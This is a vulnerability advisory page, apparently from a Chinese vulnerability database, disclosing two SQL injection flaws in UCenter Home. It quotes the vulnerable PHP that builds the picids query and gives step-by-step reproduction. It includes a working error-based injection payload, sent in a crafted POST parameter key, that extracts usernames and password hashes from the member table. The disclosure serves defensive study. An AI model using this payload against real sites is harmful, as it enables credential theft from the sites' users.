|Ucenter Home最新版SQL注入两处 - VULHUB开源网络安全威胁库

Ucenter Home最新版SQL注入两处

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： Ucenter Home最新版SQL注入两处，比较隐蔽 ### 详细说明：在编辑日志处文件cp_blog.php： ``` //添加编辑操作 if(submitcheck('blogsubmit')) { if(empty($blog['blogid'])) { $blog = array(); } else { if(!checkperm('allowblog')) { ckspacelog(); showmessage('no_authority_to_add_log'); } } //验证码 if(checkperm('seccode') && !ckseccode($_POST['seccode'])) { showmessage('incorrect_code'); } include_once(S_ROOT.'./source/function_blog.php'); if($newblog = blog_post($_POST, $blog)) { if(empty($blog) && $newblog['topicid']) { $url = 'space.php?do=topic&topicid='.$newblog['topicid'].'&view=blog'; } else { $url = 'space.php?uid='.$newblog['uid'].'&do=blog&id='.$newblog['blogid']; } showmessage('do_success', $url, 0); } else { showmessage('that_should_at_least_write_things'); } } ``` 注意这里的$newblog = blog_post($_POST, $blog) 更新内容应该是在blog_post函数，跟进。文件function_blof.php： ``` //添加博客 function blog_post($POST, $olds=array()) { global $_SGLOBAL, $_SC, $space; //操作者角色切换 $isself = 1; if(!empty($olds['uid']) && $olds['uid'] != $_SGLOBAL['supe_uid']) { $isself = 0; $__SGLOBAL = $_SGLOBAL; $_SGLOBAL['supe_uid'] = $olds['uid']; $_SGLOBAL['supe_username'] = addslashes($olds['username']); } ...... //获取上传的图片 $uploads = array(); if(!empty($POST['picids'])) { $picids = array_keys($POST['picids']); print_r($picids); $query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'"); while ($value = $_SGLOBAL['db']->fetch_array($query)) { if(empty($titlepic) && $value['thumb']) { $titlepic = $value['filepath'].'.thumb.jpg'; $blogarr['picflag'] = $value['remote']?2:1; } $uploads[$POST['picids'][$value['picid']]] = $value; } if(empty($titlepic) && $value) { $titlepic = $value['filepath']; $blogarr['picflag'] = $value['remote']?2:1; } } ``` 在获取上传图片时，看这里的关键代码： ``` $picids = array_keys($POST['picids']); $query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'"); ``` $picids = array_keys($POST['picids'])，获取了picids的数组的全部键值然后picdis进入了SQL，这里导致了SQL注入。第二处SQL注入文件cp_thread.php ``` if(submitcheck('threadsubmit')) { $tid = $_POST['tid'] = intval($_POST['tid']); $tagid = empty($_POST['tagid'])?0:intval($_POST['tagid']); if($eventid && $event['tagid']!=$tagid) { showmessage('event_mtag_not_match'); } ......//省略 //获取上传的图片 $uploads = array(); if(!empty($_POST['picids'])) { $picids = array_keys($_POST['picids']); $query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'"); while ($value = $_SGLOBAL['db']->fetch_array($query)) { if(empty($titlepic) && $value['thumb']) { $titlepic = pic_get($value['filepath'], $value['thumb'], $value['remote']); } $uploads[$_POST['picids'][$value['picid']]] = $value; } if(empty($titlepic) && $value) { $titlepic = pic_get($value['filepath'], $value['thumb'], $value['remote']); } } ``` 通用先获取了$_POST['picids']的值，然后直接进入了SQL语句，导致SQL注入漏洞证明同第一处SQL注入。 ### 漏洞证明： 1、发表一篇日志 2、编辑日志 3、在编辑日志是，上传图片： [<img src="https://images.seebug.org/upload/201407/251626036960fe495f3972916aa18f8cf98eb054.png" alt="666.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/251626036960fe495f3972916aa18f8cf98eb054.png) 4、然后保存是，抓包，修改POST数据：修改picids[3]为： ``` picids[3',(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username, 0x23, password) from uchome_member limit 0,1))a from information_schema.tables group by a)b))#]" ``` [<img src="https://images.seebug.org/upload/201407/25163540977ca97652931857ff7ba66558a39547.png" alt="777.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/25163540977ca97652931857ff7ba66558a39547.png) 最后执行的sql语句为： ``` SELECT * FROM uchome_pic WHERE picid IN ('3',(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username, 0x23, password) from uchome_member limit 0,1))a from information_schema.tables group by a)b))#','4') AND uid='2' ``` 然后看返回： [<img src="https://images.seebug.org/upload/201407/2516355339bb38aa79954fe6c11cf552c51d9a1f.png" alt="888.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2516355339bb38aa79954fe6c11cf552c51d9a1f.png) [<img src="https://images.seebug.org/upload/201407/2516372696e622bb8284032a4c11f031b14fcc4e.png" alt="888-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2516372696e622bb8284032a4c11f031b14fcc4e.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™